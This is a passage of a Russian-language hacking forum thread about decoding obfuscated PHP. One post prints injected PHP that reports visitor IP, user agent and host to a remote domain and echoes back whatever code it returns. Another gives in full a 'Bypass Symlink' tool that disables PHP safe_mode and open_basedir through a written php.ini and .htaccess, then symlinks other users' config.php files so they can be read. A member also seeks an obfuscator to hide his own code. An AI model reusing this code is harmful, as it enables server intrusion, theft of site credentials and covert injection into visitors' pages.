Старый 01.11.2012, 11:21   #81
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

PHP код:
if((preg_match("/" implode("|", array("Google","Slurp","MSNBot","ia_archiver","Yandex","Rambler") . "/i"$_SERVER[HTTP_USER_AGENT])) or (isset($_COOKIE["stats"]))) {} else { @setcookie("stats",md5("stats")),time()+10800); 

$evalsssgqulVBTkZLAch = @file_get_contents("http://f528764d624db129b32c21fbca0cb8d6.com/in.php?i=$_SERVER[REMOTE_ADDR]&b=urlencode($_SERVER[HTTP_USER_AGENT])&h=urlencode($_SERVER[HTTP_HOST]));

if (strstr(
$evalsssgqulVBTkZLAch,"!go!")){$evalsssgqulVBTkZLAch explode("!go!",$evalsssgqulVBTkZLAch); $evalsssgqulVBTkZLAch $evalsssgqulVBTkZLAch[1];echo $evalsssgqulVBTkZLAch;}

Последний раз редактировалось Pashkela; 01.11.2012 в 20:26..
Pashkela вне форума   Ответить с цитированием
Старый 04.11.2012, 11:05   #82
Agel_Nash
 
Аватар для Agel_Nash
 
Регистрация: 24.07.2012
Сообщений: 30
Репутация: 18
По умолчанию

2Pashkela как таковой тут обфускации уже нет. пруф.
__________________
Я - вильгельм заколебатель
Agel_Nash вне форума   Ответить с цитированием
Старый 04.11.2012, 13:06   #83
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 352
Репутация: 105
По умолчанию

Цитата:
Сообщение от Agel_Nash Посмотреть сообщение
2Pashkela как таковой тут обфускации уже нет. пруф.
Цитата:
Результат: f528764d624db129b32c21fbca0cb8d6.com
Вот и попались! Переходим на сайт и видим…
Мда… Неожиданно! Нет слов… пойду думать над смыслом жизни…
Аффтар лучше бы подумал о ифеймах.
b3 вне форума   Ответить с цитированием
Старый 04.11.2012, 18:37   #84
Fireman
 
Регистрация: 28.10.2012
Сообщений: 6
Репутация: 0
По умолчанию

Pashkela, спасибо! Да действительно на f528764d624db129b32c21fbca0cb8d6.com стоит фрейм

Цитата:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>AWStats - Free log file analyzer for advanced statistics (GNU GPL).</title>
</head>
<frameset frameborder=0 framespacing=0 border=0 rows='100%,*' noresize><frame src='http://awstats.sourceforge.net/' noresize /></frameset>
</html>
Хороший способ ныкать барахлишко

Вопрос такой, кто чем пользуется для обфускации пхп кода? Пробовал обфускатор от каими, он не подходит, онлайн сервисы тоже - потому что нужно обфусцировать код на лету, в идеале ищу что-то похожее из моего поста
Может есть у кого под личные нужды сапомисный обфускатор, буду рад принять в дар либо купить за денюшку :-)
Fireman вне форума   Ответить с цитированием
Старый 21.11.2013, 23:51   #85
recfrf
 
Регистрация: 29.07.2010
Сообщений: 40
Репутация: 1
По умолчанию

кто знаком с кодировкой ioncube, в начале файла есть цифры вида <?php //007a2.
Как их получить при кодировании нового файла, нужно чтобы они совпадали у файла до раскодировки и внесения изменений и после кодировки уже измененного файла.
recfrf вне форума   Ответить с цитированием
Старый 07.07.2014, 16:56   #86
-Gory King-
 
Аватар для -Gory King-
 
Регистрация: 25.07.2010
Сообщений: 36
Репутация: 4
По умолчанию

чем запаковано?

Цитата:
http://pastebin.com/raw.php?i=C7jcTRqN
ps это не простой код-))
-Gory King- вне форума   Ответить с цитированием
Старый 07.07.2014, 17:54   #87
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

Цитата:
Сообщение от -Gory King- Посмотреть сообщение
чем запаковано?

ps это не простой код-))
Код как раз простой. Раскодировал, здесь применили 3 элементарных типа паковки большое число раз. Написать криптор/декриптор не составит труда.

Раскодировка:
PHP код:
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Bypass Symlink 2014</title><link rel="shortcut icon" href="http://www.iconj.com/ico/2/j/2j62fbaa2w.ico" type="image/x-icon" />
<link href="http://fonts.googleapis.com/css?family=Ubuntu&effect=fire-animation" rel="stylesheet" type="text/css">
<style type="text/css">
  html,body { margin: 0; padding: 0; outline: 0; }
a{ font-size: 12px; }
body { direction: ltr;  background:
url("http://i.imgur.com/hg21xZ9.png") repeat , 
url("http://megahdwall.com/wp-content/uploads/2014/06/Technology-Hacker-And-609665.jpg") no-repeat center top,top left,top right; background-color:#151515; color: rgb(0, 153, 0); text-align: center } input,textarea,select{ font-weight: bold; color: #000000; }
input,textarea,select:hover{ box-shadow: 0px 0px 4px #00cc00; }
.hedr { font-family: Tahoma, Arial, sans-serif  ;  font-size: 22px; } 
.cont a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif  ; font-size: 16px; text-shadow: 0px 0px 3px ; }
.cont a:hover{ color: #FF0000 ;  text-shadow:0px 0px 3px #ff0000 ; }
.cone a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif  ; font-size: 12px; text-shadow: 0px 0px 3px ; }
.cone a:hover{ color: #FF0000 ; text-shadow:0px 0px 3px #ff0000 ; }
.tmp tr td{ border: solid 1px #006600; padding: 2px ; font-size: 13px; }
.tmp tr td a { text-decoration: none; }
.foter{ font-size: 9pt; color: #006600 ; text-align: center }
.tmp tr td:hover{ box-shadow: 0px 0px 4px #00cc00; }
.fot{ font-family:Tahoma, Arial, sans-serif; color: #009900 ; font-size: 11pt; }
.for a : hover{ color: #FF0000 ; text-shadow: 0px 0px 1px #FF0000; }
.ir { color: #FF0000; }
.tul { face:Tahoma, Geneva, sans-serif; font-size: 7pt; }
#menu a{ padding: 1px; border: 0px solid green; color: green; text-decoration: none;color: #009900; font-weight: bold; font-family: Tahoma, Geneva, sans-serif; font-size:12px; }
#menu a:hover{ border: 0px solid red; color: red; }

</style>

</head>

<?php

// Extract php.ini //

$fp fopen("php.ini","w+");
fwrite($fp,"safe_mode = OFF
Safe_mode_gid = OFF
disable_functions = NONE
disable_classes = NONE
open_basedir = OFF
suhosin.executor.func.blacklist = NONE "
);



echo 
'<br><b class="cont" align="center"><b class="font-effect-fire-animation" style=font-family:Ubuntu;font-size:25px;color:green;>Bypass Forbidden 2014 Coded By Mauritania Attacker</b></b><br><p align="center">';
echo
'
<form method="post">
<input type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br /><br />
<input type="text" name="ghostfile" value="config.txt" size="60"/><br /><br />
<input type="submit" value="Bypass" name="symlink" /> <br /><br />





</form>
'
;
echo 
'<div class="tul"><b>PHP VERSION:</b> <font color="white" face="shell, Geneva, sans-serif" style="font-size: 8pt">';echo phpversion();

$fichier $_POST['file'];
$ghostfile $_POST['ghostfile'];
$symlink $_POST['symlink'];

if (
$symlink)
{


 
$dir "mauritania";
                    if(
file_exists($dir)) {
                            echo 
"<br><font color='red'>[+] mauritania Folder Already Exist °_° are you Drunk XD !!!</font><br />\n";
                    } else {
                            @
mkdir($dir); {
                                    echo 
'<br><b class="cont" align="center"><b class="font-effect-fire-animation" style=font-family:Ubuntu;font-size:12px;color:white;>\!/ mauritania Folder Created ^_^ \!/  </b></b>';
                                    echo 
'<br><b class="cont" align="center"><b class="font-effect-fire-animation" style=font-family:Ubuntu;font-size:12px;color:white;>File Retrieved Successfully</b></b>';

                    } }

// Extract Priv8 htaccess File //                    
$priv9  "#Priv9 htaccess By Mauritania Attacker
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
DirectoryIndex 
$ghostfile
ForceType text/plain
AddType text/plain .php 
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
AddHandler server-parsed .php
AddHandler txt .php
AddHandler txt .html
AddHandler txt .shtml
Options All
SetEnv PHPRC "
.dirname(__FILE__)."/mauritania/php.ini
suPHP_ConfigPath "
.dirname(__FILE__)."/mauritania/php.ini
"
;
$f =@fopen ('mauritania/.htaccess','w');
@
fwrite($f $priv9);

@
symlink("$fichier","mauritania/$ghostfile");

echo 
'<br /><a target="_blank" href="mauritania/" ><font color="white" size"12">'.$ghostfile.'</a></font>';

}
echo
'<br><b class="cont" align="center"><b class="font-effect-fire-animation" style=font-family:Ubuntu;font-size:15px;color:green;>GreetZ To : AnonGhost - Teamp0ison - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG</b></b>';
?>
NameSpace вне форума   Ответить с цитированием
Старый 06.11.2014, 14:13   #88
-Gory King-
 
Аватар для -Gory King-
 
Регистрация: 25.07.2010
Сообщений: 36
Репутация: 4
По умолчанию

Цитата:
http://pastebin.com/CAsve5Vt
спасибо
-Gory King- вне форума   Ответить с цитированием
Старый 06.11.2014, 19:24   #89
Svet
 
Аватар для Svet
 
Регистрация: 11.09.2010
Сообщений: 172
Репутация: 42
По умолчанию

-Gory King-, дошел до http://pastebin.com/6j0pV4Dn. Что делает скрипт уже видно.
Svet вне форума   Ответить с цитированием
Старый 14.11.2016, 01:09   #90
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 98
Репутация: 17
По умолчанию

Код:
00010000d5c9b6787a0734489ea15c588e3061f818f913022d69ea51fb665bcd97d906ca07060069bf0c3c4d6fc7384b1e44dd09f92001e9a7d1370cbb99315270fa708839ad5ff3f17d99b9731930acf37ae4e41af92935c657b88bb0c68ab7ea51a7473668e27d3b61120d7ed0f795215c95550faba6968be7efb913c461e15476bead9f32fc3d64c667b4fdc043918c20e3d83f4d2dbcec6f093333787d4883fd23b3ff0674689a143af03a7b3c477b7cc58a244550a0910a35e889098291d3576ac7
Внутри некие сериализованные данные с которыми работает python скрипт. Может кто-то видел что-то подобное, гугл не помог
crlf вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd. Перевод: zCarot